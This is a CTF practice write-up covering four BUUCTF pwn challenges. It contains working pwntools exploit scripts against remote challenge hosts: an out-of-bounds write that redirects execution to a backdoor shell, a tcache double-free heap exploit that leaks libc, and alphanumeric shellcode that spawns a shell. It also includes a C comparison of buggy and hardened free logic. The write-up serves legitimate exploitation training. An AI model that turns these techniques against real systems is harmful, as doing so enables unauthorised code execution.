PWN-PRACTICE-BUUCTF-25
生活随笔
- wustctf2020_name_your_cat
- ciscn_2019_final_2
- mrctf2020_shellcode_revenge
- zctf2016_note2
wustctf2020_name_your_cat
The name array is indexed without a bounds check, so an out-of-bounds index lets us overwrite the saved return address with the address of the backdoor shell function.

```python
from pwn import *

# io = process('./wustctf2020_name_your_cat')
io = remote('node4.buuoj.cn', 28864)
elf = ELF('./wustctf2020_name_your_cat')
shell = 0x080485CB  # backdoor function that spawns a shell

# Give cats 1-4 a dummy name, then use index 7, which the program does not
# bounds-check, to write the backdoor address over the saved return address.
for i in range(1, 5):
    io.sendlineafter('Name for which?\n>', str(i))
    io.sendlineafter('Give your name plz: ', 'a')
io.sendlineafter('Name for which?\n>', '7')
io.sendlineafter('Give your name plz: ', p32(shell))
io.interactive()
```

ciscn_2019_final_2
Reference: ciscn_2019_final_2
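The double free the script below relies on comes from a single "already allocated" flag that free(2) clears and add(1) sets again, while the freed pointer is left in place. This added C example (not the challenge binary, whose source is not on the page; the shared-flag layout is an assumption taken from the script's comments) replays that prefix of the script against the vulnerable policy and against the fix of tracking ownership per slot and nulling the pointer on free.

```c
#include <stddef.h>
struct heap {
    void *slot[2];   /* slot 0 = "int" type, slot 1 = "short int" type */
    int allocated;   /* assumed vulnerable design: one flag shared by both slots */
};
/* Stand-in allocator so the replay never performs a real double free:
 * chunks come from a static arena and every release is recorded. */
static char arena[8][0x40];
static void *released[16];
static int next_chunk, nreleased, double_releases;
static void *chunk_alloc(void) { return arena[next_chunk++ % 8]; }
static void chunk_release(void *p) {
    for (int i = 0; i < nreleased; i++)
        if (released[i] == p) double_releases++;   /* same chunk released twice */
    if (nreleased < 16) released[nreleased++] = p;
}
static void heap_add(struct heap *h, int which) {
    h->slot[which] = chunk_alloc();
    h->allocated = 1;                  /* re-arms free() for *every* slot */
}

/* Vulnerable policy: only the shared flag is consulted; pointer left dangling. */
int buggy_free(struct heap *h, int which) {
    if (!h->allocated) return 0;
    chunk_release(h->slot[which]);
    h->allocated = 0;
    return 1;
}

/* Hardened policy: the slot pointer itself records ownership and is cleared. */
int safe_free(struct heap *h, int which) {
    if (which < 0 || which > 1 || h->slot[which] == NULL) return 0;
    chunk_release(h->slot[which]);
    h->slot[which] = NULL;             /* a second free() of this slot is refused */
    return 1;
}

/* Replays the script's prefix add(1) free(1) add(2)x4 free(2) add(1) free(2)
 * (types 1/2 mapped to slots 0/1); returns how many double releases got through. */
int replay(int (*free_fn)(struct heap *, int)) {
    struct heap h = { { NULL, NULL }, 0 };
    next_chunk = nreleased = double_releases = 0;
    heap_add(&h, 0); free_fn(&h, 0);
    for (int i = 0; i < 4; i++) heap_add(&h, 1);
    free_fn(&h, 1);
    heap_add(&h, 0);                   /* add(1) sets the shared flag back to 1 */
    free_fn(&h, 1);                    /* same slot-1 chunk, freed a second time */
    return double_releases;            /* 1 with buggy_free, 0 with safe_free */
}
```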
```python
# -*- coding:utf-8 -*-
from pwn import *

# context.log_level = "debug"
# io = process("./ciscn_final_2")
io = remote("node4.buuoj.cn", 29994)
elf = ELF("./ciscn_final_2")
libc = ELF("./libc-2.27-18-x64.so")


def add(num_type, num):
    io.sendlineafter("which command?\n> ", "1")
    io.sendlineafter("TYPE:\n1: int\n2: short int\n>", str(num_type))
    io.sendlineafter("your inode number:", str(num))


def free(num_type):
    io.sendlineafter("which command?\n> ", "2")
    io.sendlineafter("TYPE:\n1: int\n2: short int\n>", str(num_type))


def show(num_type):
    io.sendlineafter("which command?\n> ", "3")
    io.sendlineafter("TYPE:\n1: int\n2: short int\n>", str(num_type))
    if num_type == 1:
        io.recvuntil("your int type inode number :")
    elif num_type == 2:
        io.recvuntil("your short type inode number :")
    return int(io.recvuntil("\n")[:-1])


def exit():
    io.sendlineafter("which command?\n> ", "4")
    return io.recvall()


# gdb.attach(io)
add(1, 0x30)   # chunk 0
free(1)        # chunk 0 out
add(2, 0x20)   # chunk 1
add(2, 0x20)   # chunk 2
add(2, 0x20)   # chunk 3
add(2, 0x20)   # chunk 4
free(2)        # chunk 4 out
# The free(2) above cleared the bool, so to build the double free we must add
# once more so the bool is set back to 1.
add(1, 0x30)   # chunk 0
free(2)        # chunk 4 out again: double free

# show(2) returns chunk 4's fd, which sits at a fixed offset of 0xa0 from chunk 0's prev_size
addr_chunk0_prev_size = show(2) - 0xa0
print("addr_chunk0_prev_size==" + hex(addr_chunk0_prev_size))
add(2, addr_chunk0_prev_size)
add(2, addr_chunk0_prev_size)
add(2, 0x91)   # set both chunk 0's prev_size and size fields to 0x91

# Fill the tcache bin so the next free goes past it
for i in range(0, 7):
    free(1)
    add(2, 0x20)
free(1)        # this free puts the chunk into the unsorted bin

main_arena = show(1) - 96   # show(1) returns main_arena+96
print("main_arena==" + hex(main_arena))
libc_base = main_arena - 0x10 - libc.sym["__malloc_hook"]   # main_arena sits at a fixed 0x10 after __malloc_hook
print("libc_base==" + hex(libc_base))
stdin_fileno = libc_base + libc.sym["_IO_2_1_stdin_"] + 0x70   # +0x70: fixed offset of the field inside the struct
print("stdin_fileno==" + hex(stdin_fileno))

# The last free(1) above put the 0x91 chunk into the unsorted bin; this add only
# mallocs 0x20, so it is carved out of that 0x91 chunk.
add(1, stdin_fileno)
add(1, 0x30)
free(1)
add(2, 0x20)
free(1)        # double free
addr_chunk0_fd = show(1) - 0x30   # obtain chunk 0's fd
add(1, addr_chunk0_fd)
add(1, addr_chunk0_fd)
add(1, 111)
add(1, 666)    # overwrite the value at stdin_fileno with 666
print(exit())
io.interactive()
```

mrctf2020_shellcode_revenge
The program checks that every input byte falls within a restricted ASCII range: upper-case and lower-case letters plus digits.
It then executes `call rax`, so this is a printable (alphanumeric) shellcode challenge.
Reference: guide to generating pure-alphanumeric shellcode
alpha3 method:
Writing the shellcode file out through shell redirection did not quite work; extracting the bytes and creating a binary file by hand does.
Result after running shellcode.py:
Then create an empty file in WinHex, fill it with the hex bytes obtained above, and save it under the name shellcode.
The rest follows the approach in the referenced blog post.
AE64 method:

```python
from pwn import *
from ae64 import AE64

context.log_level = 'debug'
context.arch = 'amd64'

# io = process('./example1')
io = remote('node4.buuoj.cn', 25235)

obj = AE64()
sc = obj.encode(asm(shellcraft.sh()), 'rax')

io.recvuntil("Show me your magic!\n")
# io.sendline(sc)
io.send(sc)  # must use send, not sendline
io.interactive()
```

zctf2016_note2
unlink
Reference 1: 2016 ZCTF note2 writeup
Reference 2: zctf2016_note2